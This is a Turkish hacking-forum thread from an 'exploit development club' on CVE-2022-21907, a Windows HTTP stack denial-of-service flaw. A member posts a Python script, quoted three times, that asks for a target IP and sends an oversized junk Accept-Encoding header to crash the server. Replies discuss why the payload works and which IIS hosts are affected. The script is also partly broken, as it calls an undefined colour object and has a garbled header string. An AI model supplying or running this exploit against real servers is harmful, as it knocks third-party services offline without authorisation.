CVE-2022-21907 Http Dos Python - Exploit Geliştirme Kulübü

Çokgen · 16 Nis 2024

Merhabalar, bugün @'BARBAROS hocamın CVE-2022-21907 HTTP DOS Güvenlik Açığı Nedir ? konusun exploitini yazmaktayım.

Pythonda requests kütüphanesi ile kodu yazıcağım. Kod güzel gözüksün diye renk özellikleri ekliyeceğim.
Kod:

Python:

import requests
import time

class bccolar():
                YESIL = '\033[92m'
                SARI = '\033[93m'
                KIRMIZI = '\033[91m'
                GRI = '\033[90m'
                MAVI = '\033[34m'

ip = input(bccolar.KIRMIZI +"İp adresini giriniz:\n")

print(Fore.MAVI +"Payload gönderiliyor...")
time.sleep(1)
print(bccolar.YESIL)
poc = requests.get(f'http://{ip}/', headers = {'Accept-Encoding': 'AAAAAAAAAAAAAAAAAAAAAAAA,\
     BBBBBBcccACCCACACATTATTATAASDFADFAFSDDAHJSKSKKSKKSKJHHSHHHAY&AU&**SISODDJJDJJDJJJDJJSU**S,\
     RRARRARYYYATTATTTTATTATTATSHHSGGUGFURYTIUHSLKJLKJMNLSJLJLJSLJJLJLKJHJVHGF,\
     TTYCTCTTTCGFDSGAHDTUYGKJHJLKJHGFUTYREYUTIYOUPIOOLPLMKNLIJOPKOLPKOPJLKOP,\
     OOOAOAOOOAOOAOOOAOOOAOOOAOO,\
     ****************************stupiD, *, ,',})

ACE Veen · 16 Nis 2024

Çokgen' Alıntı:
Merhabalar, bugün @'BARBAROS hocamın CVE-2022-21907 HTTP DOS Güvenlik Açığı Nedir ? konusun exploitini yazmaktayım.

Pythonda requests kütüphanesi ile kodu yazıcağım. Kod güzel gözüksün diye renk özellikleri ekliyeceğim.
Kod:

Python:

import requests import time class bccolar(): YESIL = '\033[92m' SARI = '\033[93m' KIRMIZI = '\033[91m' GRI = '\033[90m' MAVI = '\033[34m' ip = input(bccolar.KIRMIZI +"İp adresini giriniz:\n") print(Fore.MAVI +"Payload gönderiliyor...") time.sleep(1) print(bccolar.YESIL) poc = requests.get(f'http://{ip}/', headers = {'Accept-Encoding': 'AAAAAAAAAAAAAAAAAAAAAAAA,\ BBBBBBcccACCCACACATTATTATAASDFADFAFSDDAHJSKSKKSKKSKJHHSHHHAY&AU&**SISODDJJDJJDJJJDJJSU**S,\ RRARRARYYYATTATTTTATTATTATSHHSGGUGFURYTIUHSLKJLKJMNLSJLJLJSLJJLJLKJHJVHGF,\ TTYCTCTTTCGFDSGAHDTUYGKJHJLKJHGFUTYREYUTIYOUPIOOLPLMKNLIJOPKOLPKOPJLKOP,\ OOOAOAOOOAOOAOOOAOOOAOOOAOO,\ ****************************stupiD, *, ,',})

Daha fazla detay edinmek istiyorsanız link:

CVE-2022-21907 HTTP DOS Güvenlik Açığı Nedir ?

CVE-2022-21907 HTTP DOS Güvenlik Açığı Nedir ? Son zamanlarda, Microsoft Windows HTTP protokol stack için bir CVE (Ortak Zayıflık ve Pozisyon) kamuoyuna açıklandı. Uzaktan, kimlik doğrulamasız bir saldırganın sistemi tamamen ele geçirmesine neden olabileceği etkilenen çeşitli Windows sürümleri...

www.turkhackteam.org

veri boyutunu artırmak için accept encoding mi kullanıyorsunuz ?

Çokgen · 16 Nis 2024

ACE Veen' Alıntı:
veri boyutunu artırmak için accept encoding mi kullanıyorsunuz ?

Yok, bu benimde anladığım kadarıyla bir payload, @'BARBAROS hocaca sorabilirsin, ona sorabilirsin. Benim anladığım kadarıyla bir payload.

'BARBAROS · 16 Nis 2024

Çokgen' Alıntı:

Merhabalar, bugün @'BARBAROS hocamın CVE-2022-21907 HTTP DOS Güvenlik Açığı Nedir ? konusun exploitini yazmaktayım.

Pythonda requests kütüphanesi ile kodu yazıcağım. Kod güzel gözüksün diye renk özellikleri ekliyeceğim.
Kod:

Python:

import requests
import time

class bccolar():
                YESIL = '\033[92m'
                SARI = '\033[93m'
                KIRMIZI = '\033[91m'
                GRI = '\033[90m'
                MAVI = '\033[34m'

ip = input(bccolar.KIRMIZI +"İp adresini giriniz:\n")

print(Fore.MAVI +"Payload gönderiliyor...")
time.sleep(1)
print(bccolar.YESIL)
poc = requests.get(f'http://{ip}/', headers = {'Accept-Encoding': 'AAAAAAAAAAAAAAAAAAAAAAAA,\
     BBBBBBcccACCCACACATTATTATAASDFADFAFSDDAHJSKSKKSKKSKJHHSHHHAY&AU&**SISODDJJDJJDJJJDJJSU**S,\
     RRARRARYYYATTATTTTATTATTATSHHSGGUGFURYTIUHSLKJLKJMNLSJLJLJSLJJLJLKJHJVHGF,\
     TTYCTCTTTCGFDSGAHDTUYGKJHJLKJHGFUTYREYUTIYOUPIOOLPLMKNLIJOPKOLPKOPJLKOP,\
     OOOAOAOOOAOOAOOOAOOOAOOOAOO,\
     ****************************stupiD, *, ,',})

Selamlar Hocam dememize gerek yok. THT de herhangi bir faaliyetim bulunmıcak.Umarım bu kısımda gelişirsiniz kolay gelsin.

'Ranger · 18 Nis 2024

bu zafiyeti sömüren kod HTTP stack inde bulunan 'Accept-Encoding' gönderilen request sonucu istersen içine 500 tane de a girebilirsin gine çöker. buna ek olarakta windows da ISS server kurulu olması lazım ki her versyonda var diyeceğimiz bir durum yok

Security Update Guide - Microsoft Security Response Center

msrc.microsoft.com

bu linkte görebilirisn hangi windows vesyonlarda bu zafiyet var diye kendindeki windows versyonunu kontrol etmen içinde "winver" yazarak görebilirsin eğer güncellemeler açıksa muhtemelen kapatılmıştır. ancak aynı versyonu taşısanda ISS sende kurulu olması lazım etkili olsun diye.

dos için de şu konu incelemeni öneriyorum

Microsoft HTTP Protocol Stack Denial Of Service ≈ Packet Storm

Information Security Services, News, Files, Tools, Exploits, Advisories and Whitepapers

packetstormsecurity.com

burda göreceksin biraz daha anlayabilirsin eğer gine anlamaz isen at yapay zekaya sana satır satır ne iş yaptığını anlatsın

CVE-2022-21907 Http Dos Python - Exploit Geliştirme Kulübü

Çokgen

Katılımcı Üye

ACE Veen

Uzman üye

CVE-2022-21907 HTTP DOS Güvenlik Açığı Nedir ?

Çokgen

Katılımcı Üye

'BARBAROS

Uzman üye

'Ranger

Anka Red Team Direktörü

Security Update Guide - Microsoft Security Response Center

Microsoft HTTP Protocol Stack Denial Of Service ≈ Packet Storm

Sosyal medya sayfalarımız